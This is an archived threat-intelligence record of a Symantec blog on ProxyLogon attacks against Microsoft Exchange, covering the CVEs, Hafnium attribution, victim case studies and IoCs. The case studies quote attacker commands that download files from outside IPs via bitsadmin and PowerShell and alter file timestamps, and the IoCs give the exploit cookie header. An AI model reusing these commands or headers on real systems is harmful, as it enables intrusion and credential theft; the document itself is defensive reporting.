{ "id": "6885f6f4-b2cb-4a66-b364-ca7d3182fb2c", "created_at": "2026-04-06T01:32:20.714728Z", "updated_at": "2026-04-10T03:35:48.600307Z", "deleted_at": null, "sha1_hash": "7a4459ec6c7e943e8394d6382fa9f7874fc7e9c1", "title": "How Symantec Stops Microsoft Exchange Server Attacks", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 89810, "plain_text": "How Symantec Stops Microsoft Exchange Server Attacks\r\nBy About the Author\r\nArchived: 2026-04-06 01:19:42 UTC\r\nBlog updated March 11: Case studies detailing post-compromise activity seen by Symantec added, along with\r\nadditional IoCs\r\nBlog updated March 9: IoCs, additional signatures, and pre-exploitation process diagram added. \r\nUsers of Microsoft Exchange Server are advised to update to the latest version immediately, as a growing number\r\nof attackers are attempting to exploit four recently patched zero-day vulnerabilities in the software.\r\nMicrosoft released emergency patches last week (March 2) for the four vulnerabilities, which were being\r\nexploited by attackers in the wild. At the time, Microsoft said these vulnerabilities were being exploited by an\r\nadvanced persistent threat (APT) group it dubbed Hafnium (Symantec tracks this group as Ant) in targeted attacks.\r\nHowever, since then it has been reported that multiple threat actors have been rushing to exploit these\r\nvulnerabilities in Exchange Server.\r\nTwo of the vulnerabilities (CVE-2021-26855 and CVE-2021-27065) and the technique used to chain them\r\ntogether for exploitation have been given the name “ProxyLogon” by security company DevCore. Successful\r\nexploitation of ProxyLogon allows attackers to gain a foothold on a targeted network, potentially leading to\r\nfurther compromise and data exfiltration.\r\nSymantec customers are protected from attacks exploiting these vulnerabilities.\r\nQ. When did we first find out about these attacks?\r\nMicrosoft released an out-of-band patch to address the vulnerabilities in Exchange Server on March 2, 2020. The\r\nversions impacted are Exchange Server 2013, 2016, and 2019. Security firm Volexity, which Microsoft credited in\r\nits security alert detailing the vulnerabilities, said it first saw attackers exploiting the bugs on January 6, 2021.\r\nQ. Why are these vulnerabilities so dangerous?\r\nSuccessful exploitation of these vulnerabilities allows an unauthenticated attacker to execute arbitrary code on\r\nvulnerable Exchange Servers, allowing them to gain persistent system access, access to files and mailboxes on the\r\nserver, and access to credentials stored on the system. Successful exploitation may also allow attackers to\r\ncompromise trust and identity in a vulnerable network. This gives attackers extensive access to infected networks,\r\nallowing them to steal potentially highly sensitive information from victim organizations.\r\nQ. What are the vulnerabilities being exploited?\r\nThe four zero-day vulnerabilities that Microsoft released emergency patches for are:\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/microsoft-exchange-server-protection\r\nPage 1 of 7\n\nCVE-2021-26855: This allows an unauthenticated attacker to send arbitrary HTTP requests and\r\nauthenticate as the Exchange Server. The vulnerability exploits the Exchange Control Panel (ECP) via\r\nserver-side request forgery (SSRF). This would also allow the attacker to gain access to mailboxes and read\r\nsensitive information. This forms the “ProxyLogon” exploit when chained with CVE-2021-27065.\r\nCVE-2021-27065: Allows for remote code execution. It is a post-authentication arbitrary write file\r\nvulnerability in Exchange. An attacker authenticated by using CVE-2021-29855 (as in the ProxyLogon\r\nattacks) or via stolen credentials, could write a file to any path on the server.\r\nCVE-2021-26858: Is a similar arbitrary write file vulnerability to CVE-2021-27065, and can be exploited\r\nin a similar manner.\r\nCVE-2021-27857: Is an insecure deserialization vulnerability in the Unified Messaging service. An\r\nattacker, authenticated either by using CVE-2021-26855 or via stolen admin credentials, could execute\r\narbitrary code as SYSTEM on the Exchange Server.\r\nThe following diagram shows an attack chain that an attacker could employ to gain initial access to data.\r\nQ. Who is Hafnium/Ant?\r\nHafnium, which Symantec tracks as Ant, was the group first seen exploiting the vulnerabilities in Exchange\r\nServer, according to Microsoft. It said at the time that Ant was exploiting the zero days to carry out “limited and\r\ntargeted attacks.” Microsoft said Ant used the vulnerabilities “to access on-premises Exchange servers which\r\nenabled access to email accounts, and allowed installation of additional malware to facilitate long-term access to\r\nvictim environments.” Microsoft stated with “high confidence” that the group was state-sponsored and operating\r\nout of China. It also said the group principally attacked targets in the U.S., including infectious disease\r\nresearchers, law firms, educational institutes, defense contractors, policy think tanks, and NGOs.\r\nSecurity firm Veloxity also said the group was seen deploying web shells on infected systems to allow for remote\r\naccess. Among the web shells Veloxity said it saw deployed were China Chopper variants and ASPXSPY. Veloxity\r\nalso reported seeing the group carry out post-compromise activity such as credential dumping, lateral movement\r\nvia PsExec, and archiving (likely in preparation for exfiltration of data). Microsoft also reported that Ant deployed\r\npost-compromise tools such as Covenant, PowerCat, and Nishang. It is likely the group was using publicly\r\navailable web shells and post-compromise tools in order to make attribution of the activity more difficult.\r\nQ. Is Ant still the only group exploiting these vulnerabilities?\r\nNo, since Microsoft released the emergency patches for these vulnerabilities on March 2, attacks attempting to\r\nexploit these vulnerabilities have escalated, with “multiple malicious actors beyond Hafnium” attempting to target\r\nunpatched systems, according to Microsoft.\r\nQ. Is this a targeted attack?\r\nThe initial attacks carried out by Ant appear to have been targeted, but the large number of threat actors now\r\nattempting to exploit these vulnerabilities mean these attacks are now more indiscriminate in nature.\r\nQ. What steps can I take to protect my network?\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/microsoft-exchange-server-protection\r\nPage 2 of 7\n\nWhile Symantec customers are protected from attacks attempting to exploit those vulnerabilities, all users of\r\nExchange Server are advised to update to the most recent version immediately. Microsoft has also released a\r\ndetection tool that allows you to scan your Exchange Server logs to determine if your server was compromised.\r\nThe Cybersecurity and Infrastructure Security Agency (CISA) in the U.S. has advised that all users of Exchange\r\nServer scan their systems using Microsoft’s tool, as well as issuing an Emergency Directive to instruct all federal\r\nagencies to immediately update their Exchange servers.\r\nCase Studies – Post-compromise activity\r\nSymantec researchers have observed post-compromise activity on a small number of customer machines, where\r\nattackers’ initial point of entry appears to have been through exploiting the vulnerabilities in Microsoft Exchange.\r\nIn two cases, Symantec researchers observed activity prior to the release of Microsoft’s patches on March 2.\r\nVictim 1\r\nIn one victim, a telecoms company in the Middle East, we saw activity as far back as January 2021. China\r\nChopper web shells were present on this victim’s network on January 13. China Chopper web shells were used by\r\nAnt (aka Hafnium) in the initial attacks leveraging these vulnerabilities according to reports by Veloxity. On\r\nJanuary 29, a suspicious PowerShell command was executed to download files from a domain masquerading as a\r\npopular cloud hosting provider.\r\nA few days later, on February 1, a suspicious command was executed to create a scheduled task, which executed\r\n“debug.bat” several hours later. The task was named “test”, which may indicate that the attackers were using this\r\nas a way to test scheduled tasks. Some hours later, the attackers ran “net start vdir”, which was used to launch a\r\nservice that had likely been installed by the attackers.\r\nOn February 6, a suspicious file (sok.wia) was downloaded by the attackers and was used to establish a\r\nconnection with a remote host.\r\nsok.wia 94.177.123.16 443 CSIDL_PROFILE\r\nIt is likely this connection was used by the attackers to assist in exfiltration because, shortly afterwards, credential-dumping tool Mimikatz was used to dump credentials from the system. The next day, the attackers again use\r\nsok.wia, before creating a scheduled task on a remote server (likely using stolen credentials) to execute a\r\n“server.bat” file.\r\nThe next activity was seen on February 18 when Mimikatz was executed once again, and then on February 19\r\nProcDump was used to dump Isass to “he.dmp”, which can be used to harvest credentials. Then later, on March 3,\r\na suspicious file was observed in %Temp%\\in.exe, followed by a suspicious file ({71736495-d485-477d-b836-\r\n17f0085e0780}.exe) being extracted via the WinRAR archive tool which creates a malicious file in\r\n%system%\\inetsrv\\XmlLite.dll. This was the last activity seen on this machine.\r\nVictim 2\r\nAnother victim, this one operating in the legal sector in Southeast Asia, saw activity on its network beginning on\r\nFebruary 28. This was before Microsoft issued patches for the exploited vulnerabilities, but it has been reported by\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/microsoft-exchange-server-protection\r\nPage 3 of 7\n\nVeloxity that it saw activity ramping up since February 28, so it is possible information about these vulnerabilities\r\nhad been leaked in the cyber crime fraternity by this time.\r\nThe first activity on this machine on February 28 was a command used to dump credentials that was executed via\r\nthe w3wp.exe process. On the same day ProcDump was used to dump Isass, which can be used to harvest\r\ncredentials. The next day, March 1, a file called ‘uawmiver.exe’ was executed to bypass user account control\r\n(UAC). This was used to execute two batch files called “set.bat” and “set1.bat”.\r\nOn March 3, a command was used to execute another unknown batch file, which was downloaded by bitsadmin\r\nfrom a remote host:\r\n\u0026quot;CSIDL_SYSTEM\\bitsadmin.exe\u0026quot; /rawreturn /transfer getfile http://89.34.111.11/3.avi\r\nCSIDL_PROFILE\\public\\2.bat\r\nWe then saw obfuscated PowerShell commands being executed and used to download a file from a remote host.\r\n(new-object\r\nSystem.Net.WebClient).DownloadFile('hxxp://86.105.18.116/news/code','C:\\users\\public\\opera\\code')\r\nThe next day, March 4, another PowerShell command was executed that searched for \"layout.aspx\" and\r\n\"iistart.aspx\". The last access and creation times were modified to August 21, 2017.\r\npowershell.exe -command \u0026quot;dir |where {$_.name -eq 'layout.aspx' -or $_.name -eq 'iistart.aspx' }  | foreach-object { $_.LastWriteTime = '2017-08-21 20:26:57';$_.LastAccessTime = '2017-08-21 20:26:57'; \r\n$_.CreationTime = '2017-08-21 20:26:52' }\u0026quot; \r\nThis was likely done to help conceal the malicious files and thwart any incident response investigations.\r\n7-Zip was then used to extract the contents of a ZIP archive (current.zip) that was uploaded to the Exchange server\r\nby the attackers, before the file “current.exe” was executed, which injected CobaltStrike beacon to a newly-created “svchost.exe” process for backdoor access.  Several hours after this, ntdsutil was used to dump credentials\r\nonce again.\r\nFollowing this, a file called \"mv.exe\", which is likely Mimikatz, was executed to dump credentials. This is\r\nfollowed by ProcDump being used to dump lsass to harvest additional credentials. Shortly after this, an unknown\r\nfile \"ccsvchst.exe\" was executed, which passes a collected hash.\r\nFinally, the attackers launched the publicly available \"secretsdump\" tool, to dump credentials stored in the\r\nregistry. Then, on March 8, the attackers ran Mimikatz to try to dump credentials again. This was the last activity\r\nseen on this machine.\r\nOther victims\r\nWe also observed some post-compromise activity in a small number of other organizations since Microsoft issued\r\ntheir patches on March 2, when activity ramped up significantly as it is believed a large number of threat actors\r\nwere rushing to exploit these vulnerabilities.\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/microsoft-exchange-server-protection\r\nPage 4 of 7\n\nSome of the tools we saw used in post-compromise activity in those impacted since March 2 include:\r\nPowerShell\r\nBITSAadmin\r\nCertutil\r\nCobalt Strike\r\nEarthWorm tunnel tool\r\nStowaway multi-hop proxy tool\r\nChina Chopper web shells\r\nReGeorg web shells (seen by Veloxity used in previous Exchange attacks)\r\nChisel\r\nAdfind\r\nPsExec\r\nMimikatz\r\nProcDump\r\nIn one case we also saw the attackers deleting shadow copies from infected machines, which is activity we\r\ntypically see when attackers are preparing to carry out a ransomware attack, though we did not observe\r\nransomware deployed on the machine.\r\nThe extensive use of living-off-the-land and open-source tools and tactics by the attackers leveraging these\r\nvulnerabilities make attribution of these attacks difficult and means that a wide number of different threat actors\r\nmay be responsible for these attacks.\r\nWith activity exploiting these vulnerabilities seen by Symantec as recently as March 9, these attacks are ongoing,\r\nand all users of Microsoft Exchange Server are urged to scan their environment and apply patches immediately.\r\nProtection\r\nFile-based:\r\nExp.CVE-2021-26855\r\nISB.Downloader!gen313\r\nBackdoor.Trojan\r\nHacktool\r\nHacktool.Regeorg\r\nHacktool.Nishang\r\nTrojan.Chinchop\r\nTrojan.Chinchop!gen3\r\nTrojan.Chinchop!gen4\r\nNetwork-based:\r\nAttack: Microsoft Exchange Server CVE-2021-26855\r\nWeb Attack: Microsoft Exchange Server CVE-2021-26857\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/microsoft-exchange-server-protection\r\nPage 5 of 7\n\nAttack: AntSword Activity\r\nWeb Attack: WebShell Access Attempt\r\nWeb Attack: WhatWeb Scanner Request\r\nSystem Infected: Malicious PowerShell Script Download 4\r\nSystem Infected: Malicious PowerShell Script Download 5\r\nSystem Infected: Trojan.Backdoor Activity 404\r\nWeb Attack: WebShell Access Attempt 2\r\nWeb Attack: ASP WebShell Upload Attempt\r\nData Center Security:\r\nData Center Security (DCS) Intrusion Prevention (with default policies) provides zero-day protection\r\nagainst the deployment of webshells on Exchange Servers, including those used in these attacks.\r\nFor the latest protection updates, please visit the Symantec Protection Bulletin.\r\nIndicators of Compromise (IoCs)\r\nThe presence of the following indicators on your network may help you determine if you've already been\r\nexploited.\r\nProxyLogon\r\nFile indicators\r\nThe following regex can be used to help identify suspicious aspx/webshells:\r\n.*(\\\\aspnet_client\\\\|\\\\owa\\\\auth\\\\|\\\\ecp\\\\auth\\\\).*\\.aspx\r\nNetwork indicators\r\nA HTTP GET request for /owa/auth/x.js with the following cookie header set may indicate a possible\r\nexploit attempt:\r\nX-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3\r\nLog file indicators\r\nCheck for CMD output in Exchange’s ECP Server logs:\r\nS:CMD=Set-OabVirtualDirectory.ExternalUrl=\r\nCheck IIS web server logs for following URI path:\r\n/ecp/DDI/DDIService.svc/SetObject\r\nMicrosoft Scanning Tool\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/microsoft-exchange-server-protection\r\nPage 6 of 7\n\nThis tool allows you to scan your Exchange Server logs to determine if your server was compromised.\r\nhttps://github.com/microsoft/CSS-Exchange/tree/main/Security\r\nSource: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/microsoft-exchange-server-protection\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/microsoft-exchange-server-protection\r\nPage 7 of 7", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/microsoft-exchange-server-protection" ], "report_names": [ "microsoft-exchange-server-protection" ], "threat_actors": [ { "id": "7c969685-459b-4c93-a788-74108eab6f47", "created_at": "2023-01-06T13:46:39.189751Z", "updated_at": "2026-04-10T02:00:03.241102Z", "deleted_at": null, "main_name": "HAFNIUM", "aliases": [ "Red Dev 13", "Silk Typhoon", "MURKY PANDA", "ATK233", "G0125", "Operation Exchange Marauder" ], "source_name": "MISPGALAXY:HAFNIUM", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "2704d770-43b4-4bc4-8a5a-05df87416848", "created_at": "2022-10-25T15:50:23.306305Z", "updated_at": "2026-04-10T02:00:05.296581Z", "deleted_at": null, "main_name": "HAFNIUM", "aliases": [ "HAFNIUM", "Operation Exchange Marauder", "Silk Typhoon" ], "source_name": "MITRE:HAFNIUM", "tools": [ "Tarrask", "ASPXSpy", "Impacket", "PsExec", "China Chopper" ], "source_id": "MITRE", "reports": null }, { "id": "529c1ae9-4579-4245-86a6-20f4563a695d", "created_at": "2022-10-25T16:07:23.702006Z", "updated_at": "2026-04-10T02:00:04.71708Z", "deleted_at": null, "main_name": "Hafnium", "aliases": [ "G0125", "Murky Panda", "Red Dev 13", "Silk Typhoon" ], "source_name": "ETDA:Hafnium", "tools": [], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775439140, "ts_updated_at": 1775792148, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/7a4459ec6c7e943e8394d6382fa9f7874fc7e9c1.pdf", "text": "https://archive.orkl.eu/7a4459ec6c7e943e8394d6382fa9f7874fc7e9c1.txt", "img": "https://archive.orkl.eu/7a4459ec6c7e943e8394d6382fa9f7874fc7e9c1.jpg" } }